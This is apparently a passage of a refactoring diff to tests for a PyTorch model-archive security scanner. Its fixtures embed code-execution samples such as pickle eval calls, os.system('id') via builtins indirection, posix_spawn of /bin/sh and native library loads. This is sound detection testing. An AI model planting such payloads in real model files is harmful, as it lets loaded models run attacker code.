storage_blob = b"N.#" + (b"N." * 1200) + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_comment_prefixed_pickle_after_many_proto0_int_streams( @@ -6647,20 +5079,7 @@ def test_pytorch_zip_discovery_scans_comment_prefixed_pickle_after_many_proto0_i ) -> None: model_path = tmp_path / "referenced_scalar_prefix_comment_many_int_streams_pickle.pt" storage_blob = b"N." + (b"I1\n." * 1200) + b"#" + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_persid_after_trivial_prefix_crossing_probe_boundary( @@ -6707,20 +5126,7 @@ def test_pytorch_zip_discovery_scans_frame_first_pickle_after_trivial_scalar_pre model_path = tmp_path / "referenced_scalar_prefix_frame_first_pickle.pt" payload = b"cbuiltins\neval\n(S'print(1)'\ntR." storage_blob = b"N." + b"\x95" + len(payload).to_bytes(8, "little") + payload - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) @pytest.mark.parametrize( @@ -6742,21 +5148,7 @@ def test_pytorch_zip_discovery_skips_trivial_prefix_tensor_noise( tmp_path: Path, storage_blob: bytes, ) -> None: - model_path = tmp_path / "referenced_scalar_prefix_tensor_noise.pt" - storage_blob += b"\x00" * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert result.success is True - assert result.metadata.get("pickle_verdict") == "clean" - assert result.metadata["pickle_files"] == ["archive/data.pkl"] - assert not any(issue.details.get("pickle_filename") == "archive/data/0" for issue in result.issues) - assert not any(check.details.get("pickle_filename") == "archive/data/0" for check in result.checks) + _assert_headerless_opcode_near_match(tmp_path, storage_blob, ("referenced_scalar_prefix_tensor_noise.pt")) def test_pytorch_zip_discovery_skips_large_nul_padding_storage_blob(tmp_path: Path) -> None: @@ -8024,16 +6416,7 @@ def test_pytorch_pickle_file_unsupported(tmp_path): def test_pytorch_zip_scanner_closes_bytesio(tmp_path, monkeypatch): """Ensure BytesIO objects are properly closed after scanning.""" - import io - - closed = {} - - class TrackedBytesIO(io.BytesIO): - def close(self) -> None: - closed["closed"] = True - super().close() - - monkeypatch.setattr(io, "BytesIO", TrackedBytesIO) + closed = track_bytesio_close(monkeypatch) model_path = create_mock_pytorch_zip(tmp_path / "model.pt") scanner = PyTorchZipScanner() @@ -9216,58 +7599,22 @@ def test_pytorch_zip_keeps_callback_license_urls_actionable(tmp_path: Path) -> N ], ) def test_pytorch_zip_scans_os_process_launch_source_conservatively(tmp_path: Path, payload: bytes) -> None: - zip_path = tmp_path / "model.pt" - with zipfile.ZipFile(zip_path, "w") as zipf: - zipf.writestr("archive/version", "3") - zipf.writestr("archive/data.pkl", pickle.dumps({"weights": [1, 2, 3]})) - zipf.writestr("archive/data/payload.bin", payload) + _assert_conservative_process_source(tmp_path, payload, ("OS command execution detected")) - result = PyTorchZipScanner().scan(str(zip_path)) - jit_failures = [ - check - for check in result.checks - if check.name == "JIT/Script Code Execution Detection" and check.status == CheckStatus.FAILED - ] - assert any( - check.location == f"{zip_path}:archive/data/payload.bin" and "OS command execution detected" in check.message - for check in jit_failures - ) - - -def test_pytorch_zip_allows_framed_benign_dict_literal_os_accessor(tmp_path: Path) -> None: - zip_path = tmp_path / "model.pt" - payload = b"\x00\xffdef payload():\n import os\n return {'cwd': getattr(os, 'getcwd')()}\n}" - with zipfile.ZipFile(zip_path, "w") as zipf: - zipf.writestr("archive/version", "3") - zipf.writestr("archive/data.pkl", pickle.dumps({"weights": [1, 2, 3]})) - zipf.writestr("archive/data/payload.bin", payload) - - result = PyTorchZipScanner().scan(str(zip_path)) - - assert not any( - check.name == "JIT/Script Code Execution Detection" - and check.status == CheckStatus.FAILED - and "OS command execution detected" in check.message - for check in result.checks +def test_pytorch_zip_allows_framed_benign_dict_literal_os_accessor(tmp_path: Path) -> None: + _assert_framed_pickle_without_pattern( + tmp_path, + (b"\x00\xffdef payload():\n import os\n return {'cwd': getattr(os, 'getcwd')()}\n}"), + ("OS command execution detected"), ) def test_pytorch_zip_ignores_binary_framed_string_literal_os_process_launch(tmp_path: Path) -> None: - zip_path = tmp_path / "model.pt" - payload = b"\x00\xffdef payload():\n return \"os.posix_spawn('/bin/sh', ['sh'], {})\"\n}" - with zipfile.ZipFile(zip_path, "w") as zipf: - zipf.writestr("archive/version", "3") - zipf.writestr("archive/data.pkl", pickle.dumps({"weights": [1, 2, 3]})) - zipf.writestr("archive/data/payload.bin", payload) - - result = PyTorchZipScanner().scan(str(zip_path)) - - assert not any( - check.name == "JIT/Script Code Execution Detection" - and check.status == CheckStatus.FAILED - and "OS command execution detected" in check.message - for check in result.checks + _assert_framed_pickle_without_pattern( + tmp_path, + (b"\x00\xffdef payload():\n return \"os.posix_spawn('/bin/sh', ['sh'], {})\"\n}"), + ("OS command execution detected"), ) @@ -9289,23 +7636,7 @@ def test_pytorch_zip_ignores_binary_framed_string_literal_os_process_launch(tmp_ ], ) def test_pytorch_zip_scans_asyncio_subprocess_launch_source_conservatively(tmp_path: Path, payload: bytes) -> None: - zip_path = tmp_path / "model.pt" - with zipfile.ZipFile(zip_path, "w") as zipf: - zipf.writestr("archive/version", "3") - zipf.writestr("archive/data.pkl", pickle.dumps({"weights": [1, 2, 3]})) - zipf.writestr("archive/data/payload.bin", payload) - - result = PyTorchZipScanner().scan(str(zip_path)) - - jit_failures = [ - check - for check in result.checks - if check.name == "JIT/Script Code Execution Detection" and check.status == CheckStatus.FAILED - ] - assert any( - check.location == f"{zip_path}:archive/data/payload.bin" and "Subprocess execution detected" in check.message - for check in jit_failures - ) + _assert_conservative_process_source(tmp_path, payload, ("Subprocess execution detected")) @pytest.mark.parametrize( @@ -9800,23 +8131,7 @@ def test_pytorch_zip_preserves_definitely_safe_late_conditional_alias_state(tmp_ ], ) def test_pytorch_zip_detects_late_alias_after_uncertain_safe_overwrite(tmp_path: Path, late_state: bytes) -> None: - zip_path = tmp_path / "model.pt" - padding = b"# pad\n" * (jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(b"# pad\n") + 8) - payload = b"\x00\xffimport runpy as rp\n" + padding + late_state + padding - with zipfile.ZipFile(zip_path, "w") as zipf: - zipf.writestr("archive/version", "3") - zipf.writestr("archive/data.pkl", pickle.dumps({"weights": [1, 2, 3]})) - zipf.writestr("archive/data/payload.bin", payload) - - result = PyTorchZipScanner().scan(str(zip_path)) - - assert any( - check.name == "JIT/Script Code Execution Detection" - and check.status == CheckStatus.FAILED - and check.location == f"{zip_path}:archive/data/payload.bin" - and check.rule_code == "S108" - for check in result.checks - ) + _assert_pytorch_late_typed_rule(tmp_path, b"import runpy as rp\n", late_state, "S108") @pytest.mark.parametrize( @@ -9841,23 +8156,7 @@ def test_pytorch_zip_detects_late_alias_after_uncertain_safe_overwrite(tmp_path: ], ) def test_pytorch_zip_detects_late_alias_after_non_executed_safe_shadow(tmp_path: Path, late_state: bytes) -> None: - zip_path = tmp_path / "model.pt" - padding = b"# pad\n" * (jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(b"# pad\n") + 8) - payload = b"\x00\xffimport runpy as rp\n" + padding + late_state + padding - with zipfile.ZipFile(zip_path, "w") as zipf: - zipf.writestr("archive/version", "3") - zipf.writestr("archive/data.pkl", pickle.dumps({"weights": [1, 2, 3]})) - zipf.writestr("archive/data/payload.bin", payload) - - result = PyTorchZipScanner().scan(str(zip_path)) - - assert any( - check.name == "JIT/Script Code Execution Detection" - and check.status == CheckStatus.FAILED - and check.location == f"{zip_path}:archive/data/payload.bin" - and check.rule_code == "S108" - for check in result.checks - ) + _assert_pytorch_late_typed_rule(tmp_path, b"import runpy as rp\n", late_state, "S108") def test_pytorch_zip_detects_retained_alias_after_raising_late_with_shadow(tmp_path: Path) -> None: @@ -9887,23 +8186,7 @@ def test_pytorch_zip_detects_retained_alias_after_raising_late_with_shadow(tmp_p def test_pytorch_zip_detects_forwarded_late_ctypes_attribute_load(tmp_path: Path) -> None: - zip_path = tmp_path / "model.pt" - padding = b"# pad\n" * (jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(b"# pad\n") + 8) - payload = b"\x00\xffimport ctypes as c\n" + padding + b"loader = c.cdll\nloader.msvcrt\n" + padding - with zipfile.ZipFile(zip_path, "w") as zipf: - zipf.writestr("archive/version", "3") - zipf.writestr("archive/data.pkl", pickle.dumps({"weights": [1, 2, 3]})) - zipf.writestr("archive/data/payload.bin", payload) - - result = PyTorchZipScanner().scan(str(zip_path)) - - assert any( - check.name == "JIT/Script Code Execution Detection" - and check.status == CheckStatus.FAILED - and check.location == f"{zip_path}:archive/data/payload.bin" - and check.rule_code == "S110" - for check in result.checks - ) + _assert_forwarded_native_load(tmp_path, (b"\x00\xffimport ctypes as c\n"), (b"loader = c.cdll\nloader.msvcrt\n")) @pytest.mark.parametrize( @@ -9973,23 +8256,7 @@ def test_pytorch_zip_detects_forwarded_late_ctypes_attribute_load(tmp_path: Path def test_pytorch_zip_detects_boolean_fallback_after_builtin_mapping_mutation( tmp_path: Path, prefix: bytes, late_state: bytes, rule_code: str ) -> None: - zip_path = tmp_path / "model.pt" - padding = b"# pad\n" * (jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(b"# pad\n") + 8) - payload = b"\x00\xff" + prefix + padding + late_state + padding - with zipfile.ZipFile(zip_path, "w") as zipf: - zipf.writestr("archive/version", "3") - zipf.writestr("archive/data.pkl", pickle.dumps({"weights": [1, 2, 3]})) - zipf.writestr("archive/data/payload.bin", payload) - - result = PyTorchZipScanner().scan(str(zip_path)) - - assert any( - check.name == "JIT/Script Code Execution Detection" - and check.status == CheckStatus.FAILED - and check.location == f"{zip_path}:archive/data/payload.bin" - and check.rule_code == rule_code - for check in result.checks - ) + _assert_pytorch_late_typed_rule(tmp_path, prefix, late_state, rule_code) @pytest.mark.parametrize( @@ -11670,47 +9937,12 @@ def test_pytorch_zip_preserves_safe_late_typed_member_overwrite( def test_pytorch_zip_preserves_dangerous_typed_member_captured_before_safe_overwrite( tmp_path: Path, prefix: bytes, late_state: bytes, rule_code: str ) -> None: - zip_path = tmp_path / "model.pt" - padding = b"# pad\n" * (jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(b"# pad\n") + 8) - payload = b"\x00\xff" + prefix + padding + late_state + padding - with zipfile.ZipFile(zip_path, "w") as zipf: - zipf.writestr("archive/version", "3") - zipf.writestr("archive/data.pkl", pickle.dumps({"weights": [1, 2, 3]})) - zipf.writestr("archive/data/payload.bin", payload) - - result = PyTorchZipScanner().scan(str(zip_path)) - - assert any( - check.name == "JIT/Script Code Execution Detection" - and check.status == CheckStatus.FAILED - and check.location == f"{zip_path}:archive/data/payload.bin" - and check.rule_code == rule_code - for check in result.checks - ) + _assert_pytorch_late_typed_rule(tmp_path, prefix, late_state, rule_code) def test_pytorch_zip_detects_native_load_in_rebound_typed_member_self_write(tmp_path: Path) -> None: - zip_path = tmp_path / "model.pt" - padding = b"# pad\n" * (jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(b"# pad\n") + 8) - payload = ( - b"\x00\xffimport ctypes as c\nimport webbrowser as wb\n" - + padding - + b"wb = c.cdll\nwb.open = wb.open\n" - + padding - ) - with zipfile.ZipFile(zip_path, "w") as zipf: - zipf.writestr("archive/version", "3") - zipf.writestr("archive/data.pkl", pickle.dumps({"weights": [1, 2, 3]})) - zipf.writestr("archive/data/payload.bin", payload) - - result = PyTorchZipScanner().scan(str(zip_path)) - - assert any( - check.name == "JIT/Script Code Execution Detection" - and check.status == CheckStatus.FAILED - and check.location == f"{zip_path}:archive/data/payload.bin" - and check.rule_code == "S110" - for check in result.checks + _assert_forwarded_native_load( + tmp_path, (b"\x00\xffimport ctypes as c\nimport webbrowser as wb\n"), (b"wb = c.cdll\nwb.open = wb.open\n") ) @@ -13195,20 +11427,10 @@ def test_pytorch_zip_scans_webbrowser_and_ctypes_execution_in_archive_data(tmp_p def test_pytorch_zip_ignores_certain_replaced_runpy_execution_in_archive_data(tmp_path: Path) -> None: - zip_path = tmp_path / "model.pt" - payload = b"\x00\xffimport runpy\nrunpy.run_path = len\nrunpy.run_path([])\n\x00MODEL-FRAMING" - with zipfile.ZipFile(zip_path, "w") as zipf: - zipf.writestr("archive/version", "3") - zipf.writestr("archive/data.pkl", pickle.dumps({"weights": [1, 2, 3]})) - zipf.writestr("archive/data/payload.bin", payload) - - result = PyTorchZipScanner().scan(str(zip_path)) - - assert not any( - check.name == "JIT/Script Code Execution Detection" - and check.status == CheckStatus.FAILED - and "Dynamic module execution detected" in check.message - for check in result.checks + _assert_framed_pickle_without_pattern( + tmp_path, + (b"\x00\xffimport runpy\nrunpy.run_path = len\nrunpy.run_path([])\n\x00MODEL-FRAMING"), + ("Dynamic module execution detected"), ) @@ -13233,25 +11455,15 @@ def test_pytorch_zip_ignores_framed_runpy_call_inside_multiline_literal(tmp_path def test_pytorch_zip_ignores_string_literal_asyncio_subprocess_launch_with_unrelated_risk( tmp_path: Path, ) -> None: - zip_path = tmp_path / "model.pt" - payload = ( - b"import pickle\n\n" - b"def payload(data):\n" - b" pickle.loads(data)\n" - b" return \"asyncio.create_subprocess_shell('id')\"\n" - ) - with zipfile.ZipFile(zip_path, "w") as zipf: - zipf.writestr("archive/version", "3") - zipf.writestr("archive/data.pkl", pickle.dumps({"weights": [1, 2, 3]})) - zipf.writestr("archive/data/payload.bin", payload) - - result = PyTorchZipScanner().scan(str(zip_path)) - - assert not any( - check.name == "JIT/Script Code Execution Detection" - and check.status == CheckStatus.FAILED - and "Subprocess execution detected" in check.message - for check in result.checks + _assert_framed_pickle_without_pattern( + tmp_path, + ( + b"import pickle\n\n" + b"def payload(data):\n" + b" pickle.loads(data)\n" + b" return \"asyncio.create_subprocess_shell('id')\"\n" + ), + ("Subprocess execution detected"), ) @@ -13563,72 +11775,20 @@ def test_pytorch_zip_torchscript_member_does_not_mask_critical_sidecar_pickle(tm def test_pytorch_zip_requires_exact_case_torchscript_debug_pair(tmp_path: Path) -> None: - model_path = create_mock_pytorch_zip(tmp_path / "scripted_case_mismatch.pt", prefix="archive") - source_path = "archive/code/__torch__/PAYLOAD.py" - debug_pkl = b"\x80\x02X\x18\x00\x00\x00FORMAT_WITH_STRING_TABLEq\x00." - with zipfile.ZipFile(model_path, "a") as zip_file: - zip_file.writestr( - source_path, - "\n".join( - [ - "class Payload(Module):", - " __parameters__ = []", - " __buffers__ = []", - " def forward(self: __torch__.Payload,", - " x: Tensor) -> Tensor:", - " return x", - "", - ] - ), - ) - zip_file.writestr("archive/code/__torch__/payload.py.debug_pkl", debug_pkl) - - result = PyTorchZipScanner().scan(str(model_path)) - - python_failures = [ - check - for check in result.checks - if check.name == "Python Code File Detection" and check.status == CheckStatus.FAILED - ] - assert any(check.details.get("file") == source_path for check in python_failures) - assert any( - issue.location == f"{model_path}:{source_path}" and issue.severity == IssueSeverity.WARNING - for issue in result.issues + _assert_inexact_torchscript_pair( + tmp_path, + ("scripted_case_mismatch.pt"), + ("archive/code/__torch__/PAYLOAD.py"), + ("archive/code/__torch__/payload.py.debug_pkl"), ) def test_pytorch_zip_requires_exact_case_torchscript_tree(tmp_path: Path) -> None: - model_path = create_mock_pytorch_zip(tmp_path / "scripted_tree_case_mismatch.pt", prefix="archive") - source_path = "archive/code/__TORCH__/payload.py" - debug_pkl = b"\x80\x02X\x18\x00\x00\x00FORMAT_WITH_STRING_TABLEq\x00." - with zipfile.ZipFile(model_path, "a") as zip_file: - zip_file.writestr( - source_path, - "\n".join( - [ - "class Payload(Module):", - " __parameters__ = []", - " __buffers__ = []", - " def forward(self: __torch__.Payload,", - " x: Tensor) -> Tensor:", - " return x", - "", - ] - ), - ) - zip_file.writestr("archive/code/__TORCH__/payload.py.debug_pkl", debug_pkl) - - result = PyTorchZipScanner().scan(str(model_path)) - - python_failures = [ - check - for check in result.checks - if check.name == "Python Code File Detection" and check.status == CheckStatus.FAILED - ] - assert any(check.details.get("file") == source_path for check in python_failures) - assert any( - issue.location == f"{model_path}:{source_path}" and issue.severity == IssueSeverity.WARNING - for issue in result.issues + _assert_inexact_torchscript_pair( + tmp_path, + ("scripted_tree_case_mismatch.pt"), + ("archive/code/__TORCH__/payload.py"), + ("archive/code/__TORCH__/payload.py.debug_pkl"), ) @@ -13722,6 +11882,25 @@ def test_pytorch_zip_warns_on_forged_torchscript_debug_pair(tmp_path: Path) -> N def test_pytorch_zip_warns_on_torchscript_stub_with_builtins_indirection(tmp_path: Path) -> None: + _assert_torchscript_stub_warning( + tmp_path, + (" __parameters__ = []"), + (" __buffers__ = []"), + (" return __globals__['__builtins__']['__import__']('os').system('id')"), + ) + + +def test_pytorch_zip_warns_on_torchscript_stub_with_markers_only_in_comments(tmp_path: Path) -> None: + _assert_torchscript_stub_warning(tmp_path, (" # __parameters__ = []"), (" # __buffers__ = []"), (" return x")) + + +def test_pytorch_zip_warns_on_torchscript_stub_with_breakpoint_body_call(tmp_path: Path) -> None: + _assert_torchscript_stub_warning( + tmp_path, (" __parameters__ = []"), (" __buffers__ = []"), (" return breakpoint()") + ) + + +def test_pytorch_zip_warns_on_torchscript_stub_with_print_body_call(tmp_path: Path) -> None: model_path = create_mock_pytorch_zip(tmp_path / "model.pt", prefix="archive") source_path = "archive/code/__torch__/payload.py" with zipfile.ZipFile(model_path, "a") as zip_file: @@ -13734,7 +11913,7 @@ def test_pytorch_zip_warns_on_torchscript_stub_with_builtins_indirection(tmp_pat " __buffers__ = []", " def forward(self: __torch__.Payload,", " x: Tensor) -> Tensor:", - " return __globals__['__builtins__']['__import__']('os').system('id')", + " return print('pwn')", "", ] ), @@ -13751,114 +11930,12 @@ def test_pytorch_zip_warns_on_torchscript_stub_with_builtins_indirection(tmp_pat for check in result.checks if check.name == "Python Code File Detection" and check.status == CheckStatus.FAILED ] + assert result.success is True assert any(check.details.get("file") == source_path for check in python_failures) assert all(check.severity == IssueSeverity.WARNING for check in python_failures) -def test_pytorch_zip_warns_on_torchscript_stub_with_markers_only_in_comments(tmp_path: Path) -> None: - model_path = create_mock_pytorch_zip(tmp_path / "model.pt", prefix="archive") - source_path = "archive/code/__torch__/payload.py" - with zipfile.ZipFile(model_path, "a") as zip_file: - zip_file.writestr( - source_path, - "\n".join( - [ - "class Payload(Module):", - " # __parameters__ = []", - " # __buffers__ = []", - " def forward(self: __torch__.Payload,", - " x: Tensor) -> Tensor:", - " return x", - "", - ] - ), - ) - zip_file.writestr( - "archive/code/__torch__/payload.py.debug_pkl", - b"\x80\x02X\x18\x00\x00\x00FORMAT_WITH_STRING_TABLEq\x00.", - ) - - result = PyTorchZipScanner().scan(str(model_path)) - - python_failures = [ - check - for check in result.checks - if check.name == "Python Code File Detection" and check.status == CheckStatus.FAILED - ] - assert any(check.details.get("file") == source_path for check in python_failures) - assert all(check.severity == IssueSeverity.WARNING for check in python_failures) - - -def test_pytorch_zip_warns_on_torchscript_stub_with_breakpoint_body_call(tmp_path: Path) -> None: - model_path = create_mock_pytorch_zip(tmp_path / "model.pt", prefix="archive") - source_path = "archive/code/__torch__/payload.py" - with zipfile.ZipFile(model_path, "a") as zip_file: - zip_file.writestr( - source_path, - "\n".join( - [ - "class Payload(Module):", - " __parameters__ = []", - " __buffers__ = []", - " def forward(self: __torch__.Payload,", - " x: Tensor) -> Tensor:", - " return breakpoint()", - "", - ] - ), - ) - zip_file.writestr( - "archive/code/__torch__/payload.py.debug_pkl", - b"\x80\x02X\x18\x00\x00\x00FORMAT_WITH_STRING_TABLEq\x00.", - ) - - result = PyTorchZipScanner().scan(str(model_path)) - - python_failures = [ - check - for check in result.checks - if check.name == "Python Code File Detection" and check.status == CheckStatus.FAILED - ] - assert any(check.details.get("file") == source_path for check in python_failures) - assert all(check.severity == IssueSeverity.WARNING for check in python_failures) - - -def test_pytorch_zip_warns_on_torchscript_stub_with_print_body_call(tmp_path: Path) -> None: - model_path = create_mock_pytorch_zip(tmp_path / "model.pt", prefix="archive") - source_path = "archive/code/__torch__/payload.py" - with zipfile.ZipFile(model_path, "a") as zip_file: - zip_file.writestr( - source_path, - "\n".join( - [ - "class Payload(Module):", - " __parameters__ = []", - " __buffers__ = []", - " def forward(self: __torch__.Payload,", - " x: Tensor) -> Tensor:", - " return print('pwn')", - "", - ] - ), - ) - zip_file.writestr( - "archive/code/__torch__/payload.py.debug_pkl", - b"\x80\x02X\x18\x00\x00\x00FORMAT_WITH_STRING_TABLEq\x00.", - ) - - result = PyTorchZipScanner().scan(str(model_path)) - - python_failures = [ - check - for check in result.checks - if check.name == "Python Code File Detection" and check.status == CheckStatus.FAILED - ] - assert result.success is True - assert any(check.details.get("file") == source_path for check in python_failures) - assert all(check.severity == IssueSeverity.WARNING for check in python_failures) - - -def test_pytorch_zip_warns_on_torchscript_stub_with_nul_byte(tmp_path: Path) -> None: +def test_pytorch_zip_warns_on_torchscript_stub_with_nul_byte(tmp_path: Path) -> None: model_path = create_mock_pytorch_zip(tmp_path / "model.pt", prefix="archive") source_path = "archive/code/__torch__/payload.py" with zipfile.ZipFile(model_path, "a") as zip_file: @@ -13892,73 +11969,23 @@ def test_pytorch_zip_warns_on_torchscript_stub_with_nul_byte(tmp_path: Path) -> def test_pytorch_zip_warns_on_torchscript_stub_with_class_decorator_call(tmp_path: Path) -> None: - model_path = create_mock_pytorch_zip(tmp_path / "model.pt", prefix="archive") - source_path = "archive/code/__torch__/payload.py" - with zipfile.ZipFile(model_path, "a") as zip_file: - zip_file.writestr( - source_path, - "\n".join( - [ - "@torch.classes.load_library('libpayload.so')", - "class Payload(Module):", - " __parameters__ = []", - " __buffers__ = []", - " def forward(self: __torch__.Payload,", - " x: Tensor) -> Tensor:", - " return x", - "", - ] - ), - ) - zip_file.writestr( - "archive/code/__torch__/payload.py.debug_pkl", - b"\x80\x02X\x18\x00\x00\x00FORMAT_WITH_STRING_TABLEq\x00.", - ) - - result = PyTorchZipScanner().scan(str(model_path)) - - python_failures = [ - check - for check in result.checks - if check.name == "Python Code File Detection" and check.status == CheckStatus.FAILED - ] - assert any(check.details.get("file") == source_path for check in python_failures) - assert all(check.severity == IssueSeverity.WARNING for check in python_failures) + _assert_decorated_torchscript_stub( + tmp_path, + ("@torch.classes.load_library('libpayload.so')"), + ("class Payload(Module):"), + (" __parameters__ = []"), + (" __buffers__ = []"), + ) def test_pytorch_zip_warns_on_torchscript_stub_with_class_assignment_call(tmp_path: Path) -> None: - model_path = create_mock_pytorch_zip(tmp_path / "model.pt", prefix="archive") - source_path = "archive/code/__torch__/payload.py" - with zipfile.ZipFile(model_path, "a") as zip_file: - zip_file.writestr( - source_path, - "\n".join( - [ - "class Payload(Module):", - " __parameters__ = []", - " __buffers__ = []", - " payload = torch.classes.load_library('libpayload.so')", - " def forward(self: __torch__.Payload,", - " x: Tensor) -> Tensor:", - " return x", - "", - ] - ), - ) - zip_file.writestr( - "archive/code/__torch__/payload.py.debug_pkl", - b"\x80\x02X\x18\x00\x00\x00FORMAT_WITH_STRING_TABLEq\x00.", - ) - - result = PyTorchZipScanner().scan(str(model_path)) - - python_failures = [ - check - for check in result.checks - if check.name == "Python Code File Detection" and check.status == CheckStatus.FAILED - ] - assert any(check.details.get("file") == source_path for check in python_failures) - assert all(check.severity == IssueSeverity.WARNING for check in python_failures) + _assert_decorated_torchscript_stub( + tmp_path, + ("class Payload(Module):"), + (" __parameters__ = []"), + (" __buffers__ = []"), + (" payload = torch.classes.load_library('libpayload.so')"), + ) def test_pytorch_zip_warns_on_torchscript_stub_with_class_keyword_call(tmp_path: Path) -> None: @@ -14105,11 +12132,7 @@ def test_pytorch_zip_scanner_detects_malicious_zip_pkl(tmp_path): zipf.writestr("version", "3") # Create a malicious pickle that would execute code - class MaliciousClass: - def __reduce__(self): - return (eval, ("print('pwned')",)) - - data = {"malicious": MaliciousClass()} + data = {"malicious": EvalPayload()} pickled_data = pickle.dumps(data) zipf.writestr("data.pkl", pickled_data) @@ -14468,33 +12491,13 @@ def test_pytorch_zip_scanner_does_not_trust_storage_persistent_ids_with_only_dat def test_pytorch_zip_scanner_does_not_trust_storage_persistent_ids_with_non_ascii_digit_blob( tmp_path: Path, ) -> None: - payload = _pytorch_storage_persistent_id_payload("0") - model_path = create_mock_pytorch_zip(tmp_path / "storage_persistent_id_non_ascii_digit.pt", with_pickle=False) - with zipfile.ZipFile(model_path, "a") as zipf: - zipf.writestr("version", "3") - zipf.writestr("data.pkl", payload) - zipf.writestr("data/\uff10", b"\x00" * 8) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert any(issue.details.get("pickle_rule_code") == "PERSISTENT_ID" for issue in result.issues) - assert not any(check.details.get("trusted_pytorch_archive_context") is True for check in result.checks) + _assert_non_ascii_storage_key(tmp_path, ("0"), ("storage_persistent_id_non_ascii_digit.pt"), ("data/\uff10")) def test_pytorch_zip_scanner_does_not_trust_storage_persistent_ids_with_unrelated_blob( tmp_path: Path, ) -> None: - payload = _pytorch_storage_persistent_id_payload("1") - model_path = create_mock_pytorch_zip(tmp_path / "storage_persistent_id_unrelated_blob.pt", with_pickle=False) - with zipfile.ZipFile(model_path, "a") as zipf: - zipf.writestr("version", "3") - zipf.writestr("data.pkl", payload) - zipf.writestr("data/0", b"\x00" * 8) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert any(issue.details.get("pickle_rule_code") == "PERSISTENT_ID" for issue in result.issues) - assert not any(check.details.get("trusted_pytorch_archive_context") is True for check in result.checks) + _assert_non_ascii_storage_key(tmp_path, ("1"), ("storage_persistent_id_unrelated_blob.pt"), ("data/0")) def test_pytorch_zip_scanner_scopes_storage_persistent_id_trust_by_prefix(tmp_path: Path) -> None: @@ -14881,28 +12884,14 @@ def test_pytorch_zip_scanner_recurses_into_zip_members_named_like_pickles(tmp_pa def test_pytorch_zip_scanner_bounds_nested_zip_member_copy(tmp_path: Path) -> None: """Oversized nested ZIP members should fail closed before rescanning.""" - nested_zip = tmp_path / "nested.zip" - with zipfile.ZipFile(nested_zip, "w") as archive: - archive.writestr("payload.pkl", _malicious_eval_pickle_payload()) - - zip_path = tmp_path / "nested_payload.pt" - with zipfile.ZipFile(zip_path, "w") as zipf: - zipf.writestr("version", "3") - zipf.writestr("data.pkl", pickle.dumps({"weights": [1, 2, 3]}, protocol=4)) - zipf.write(nested_zip, "archive/nested.zip") + nested_zip, zip_path = _nested_zip_fixture(tmp_path) nested_scan_calls: list[str] = [] - def scan_nested_member(path: str, config: dict[str, object] | None = None) -> ScanResult: - nested_scan_calls.append(path) - nested_result = ScanResult(scanner_name="zip") - nested_result.finish(success=True) - return nested_result - result = PyTorchZipScanner( config={ "max_nested_zip_member_bytes": nested_zip.stat().st_size - 1, - NESTED_SCAN_CALLBACK_CONFIG_KEY: scan_nested_member, + NESTED_SCAN_CALLBACK_CONFIG_KEY: partial(_record_nested_zip_scan, nested_scan_calls), } ).scan(str(zip_path)) @@ -14918,29 +12907,15 @@ def scan_nested_member(path: str, config: dict[str, object] | None = None) -> Sc def test_pytorch_zip_scanner_enforces_nested_zip_depth_limit(tmp_path: Path) -> None: """Nested ZIP recursion should stop once the shared archive depth cap is reached.""" - nested_zip = tmp_path / "nested.zip" - with zipfile.ZipFile(nested_zip, "w") as archive: - archive.writestr("payload.pkl", _malicious_eval_pickle_payload()) - - zip_path = tmp_path / "nested_payload.pt" - with zipfile.ZipFile(zip_path, "w") as zipf: - zipf.writestr("version", "3") - zipf.writestr("data.pkl", pickle.dumps({"weights": [1, 2, 3]}, protocol=4)) - zipf.write(nested_zip, "archive/nested.zip") + _nested_zip, zip_path = _nested_zip_fixture(tmp_path) nested_scan_calls: list[str] = [] - def scan_nested_member(path: str, 